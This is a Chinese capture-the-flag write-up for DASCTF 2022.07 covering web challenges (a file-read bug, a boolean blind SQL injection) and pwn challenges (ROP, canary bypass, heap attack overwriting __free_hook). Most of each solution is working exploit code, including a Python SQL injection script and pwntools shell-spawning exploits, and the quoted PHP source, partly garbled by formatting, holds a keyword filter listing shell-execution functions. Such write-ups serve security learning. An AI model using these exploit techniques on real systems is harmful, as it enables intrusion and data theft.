2022 DASCTF2022.07赋能赛 部分web pwn wp
前言:给自己两个大嘴巴子,pwn3,一直在用sendline,呜呜,应该send才可以,呜呜呜,卡在这卡了一下午,在一个地方翻了两次(好几次)车呜呜呜呜呜太菜了我
WEB
Ez to getflflag
f12,根据猜测直接查找upload.php
发现有代码
<!--?php
error_reporting(0);
session_start();
require_once('class.php');
$upload = new Upload();
$upload--->查找class.php
f = $_FILES;
}
function savefile() {
$fname = md5($this->f["file"]["name"]).".png";
if(file_exists('./upload/'.$fname)) {
@unlink('./upload/'.$fname);
}
move_uploaded_file($this->f["file"]["tmp_name"],"upload/" . $fname);
echo "upload success! :D";
}
function __toString(){
$cont = $this->fname;
$size = $this->fsize;
echo $cont->$size;
return 'this_is_upload';
}
function uploadfile() {
if($this->file_check()) {
$this->savefile();
}
}
function file_check() {
$allowed_types = array("png");
$temp = explode(".",$this->f["file"]["name"]);
$extension = end($temp);
if(empty($extension)) {
echo "what are you uploaded? :0";
return false;
}
else{
if(in_array($extension,$allowed_types)) {
$filter = '/<\?php|php|exec|passthru|popen|proc_open|shell_exec|system|phpinfo|assert|chroot|getcwd|scandir|delete|rmdir|rename|chgrp|chmod|chown|copy|mkdir|file|file_get_contents|fputs|fwrite|dir/i';
$f = file_get_contents($this->f["file"]["tmp_name"]);
if(preg_match_all($filter,$f)){
echo 'what are you doing!! :C';
return false;
}
return true;
}
else {
echo 'png onlyyy! XP';
return false;
}
}
}
}
class Show{
public $source;
public function __construct($fname)
{
$this->source = $fname;
}
public function show()
{
if(preg_match('/http|https|file:|php:|gopher|dict|\.\./i',$this->source)) {
die('illegal fname :P');
} else {
echo file_get_contents($this->source);
$src = "data:jpg;base64,".base64_encode(file_get_contents($this->source));
echo "继续探索
file.php
<!--?php
error_reporting(0);
session_start();
require_once('class.php');
$filename = $_GET['f'];
$show = new Show($filename);
$show--->发现可以直接读取文件,尝试读取flag,发现可以读取成功
payload:
http://90330b8d-de6c-4e54-bc6f-6c41ed81dedb.node4.buuoj.cn:81/file.php?f=/flag
DASCTF{5f31248c-b20d-423a-baaa-703fb5c8a0a1}绝地防御
静态页面,f12,翻找js文件,在js文件找到php文件,是个sql注入布尔类型注入,有waf,前台验证,直接burp抓包即可绕过,我这里直接在网上找个exp脚本进行跑了,跑了好久呜呜
exp:
#coding:utf-8
import requests
def database_len():
for i in range(1,10):
url = '''http://26779839-e1c7-4eca-9f15-24da4f4d28e4.node4.buuoj.cn:81/SUPPERAPI.php'''
payload = '''?id=1 and length(database())>%s''' %i #格式化输出字符串
# print(url+payload+'%23')
r = requests.get(url+payload)
if 'admin' in r.text:
print(i)
else:
#print('false')
print('database_length:',i)
break
database_len()
def database_name():
name = ''
for j in range(1,9):
for i in 'sqcwertyuioplkjhgfdazxvbnm':
url = "http://26779839-e1c7-4eca-9f15-24da4f4d28e4.node4.buuoj.cn:81/SUPPERAPI.php?id=1 and substr(database(),%d,1)='%s'" %(j,i)
# print(url+'%23')
r = requests.get(url)
if 'admin' in r.text:
name = name+i
print(name)
break
print('database_name:',name)
database_name()PWN
eyfor
思路:整数溢出+栈溢出,-1就能绕过,然后就是基础rop
exp:
from pwn import *
p=process("./pwn4")
p=remote("node4.buuoj.cn","27756")
elf1=ELF("./pwn4")
system=elf1.plt['system']
p.sendlineafter("go\n",'\x00'*0x30)
p.sendlineafter("message:",'-1')
p.sendlineafter("message:",'-1')
p.sendlineafter("message:",'-1')
p.sendlineafter("message:",'-1')
p.sendline('-1')
buf=0x6010C0
payload2='/bin/sh\x00'+'a'*(0x30-8)+'b'*8+p64(0x000000000040063e)+p64(0x0000000000400983)+p64(buf)+p64(system)
payload='cat flag'+'a'*(0x30-8)+'b'*8+p64(0x4007B7)
sleep(0.5)
p.sendline(payload2)
raw_input()
p.interactive()MyCanary2
思路:add canary能写成固定的,然后基础栈溢出打后门,leak固定,然后退出返回地址到后门即可
exp:
from pwn import *
p=process('./MyCanary2')
p=remote("node4.buuoj.cn","25051")
def add(code):
p.sendlineafter("choice\n",'1')
p.sendlineafter("code:\n",code)
def leak():
p.sendlineafter("choice\n",'2')
add('a'*0x6c+p32(0x0)+'b'*8+p64(0x40101a)+p64(0x401573))
leak()
p.sendlineafter("choice\n",'3')
p.interactive()compat
思路:能错误使用free,leak出libc基地址,在add有个任意性写,a1&0x80!=0,写个0xff就能过,这里有个点卡了我一下午,就是在使用read写入数据要用send不能用sendline,因为会多一个0a,这里导致我写了0xff,多出一个0a到下个read,就不能利用下面read,给自己两个大嘴巴子,然后绕过检测就可以利用任意写劫持下个trunk,任意写进tc为freehook,就可以rce了,我好菜,!!!!!
exp:
from pwn import *
def add(data,tag):
p.sendlineafter("choice: \n",'1')
p.sendafter("data: \n",str(data))
p.sendafter("tag: \n",str(tag))
def show(idx):
p.sendlineafter("choice: \n",'2')
p.sendlineafter("idx: \n",str(idx))
def dele(idx):
p.sendlineafter("choice: \n",'3')
p.sendlineafter("idx: \n",str(idx))
def reset():
p.sendlineafter("choice: \n",'4')
p=process("./compact")
for i in range(8):
add("jjjj"+str(i),"\x00")
for i in range(8):
dele(i)
add('j1','\x00')
add('j2','\x00')
dele(0)
dele(1)
reset()
for i in range(7):
add("jj"+str(i),"\x00")
add("A"*8,"\x00")
show(7)
p.recvuntil('A'*8)
libc_base=u64(p.recv(6).ljust(8,b'\x00'))-0x1ecbe0
print hex(libc_base)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
'''
0xe3afe execve("/bin/sh", r15, r12)
constraints:
[r15] == NULL || r15 == NULL
[r12] == NULL || r12 == NULL
0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
[r15] == NULL || r15 == NULL
[rdx] == NULL || rdx == NULL
0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
[rsi] == NULL || rsi == NULL
[rdx] == NULL || rdx == NULL
'''
rce=libc_base+0xe3b01
free_hook=libc_base+libc.sym['__free_hook']
for i in range(8):
dele(i)
reset()
'''
for i in range(8):
dele(i)
reset()
'''
add("aaaa","\x00") # 0
add("jsjs","\x00") # 1
payload="\x00"*0x60+p64(0)+p64(0x91)
add(payload,"\xff") # 2
p.send("\x00"*3+"\x90")
add("jsjs","\x00") # 3
add("jsjsjs","\x00") # 4
dele(0)
dele(1)
dele(3)
dele(2)
reset()
payload=p64(0)*3+p64(0x21)+p64(free_hook+0x90)+2*p64(0)+p64(0x91)+p64(free_hook)
add(payload,"\x00") # 0
add("aaaaaa","\x00") # 1
gdb.attach(p)
add(p64(rce),'\x00')
gdb.attach(p)
dele(4)
reset()
p.interactive()总结:题不难,就是需要仔细,这俩字仔细基本上每次比赛都提醒自己就是不注意呜呜呜!!!!!!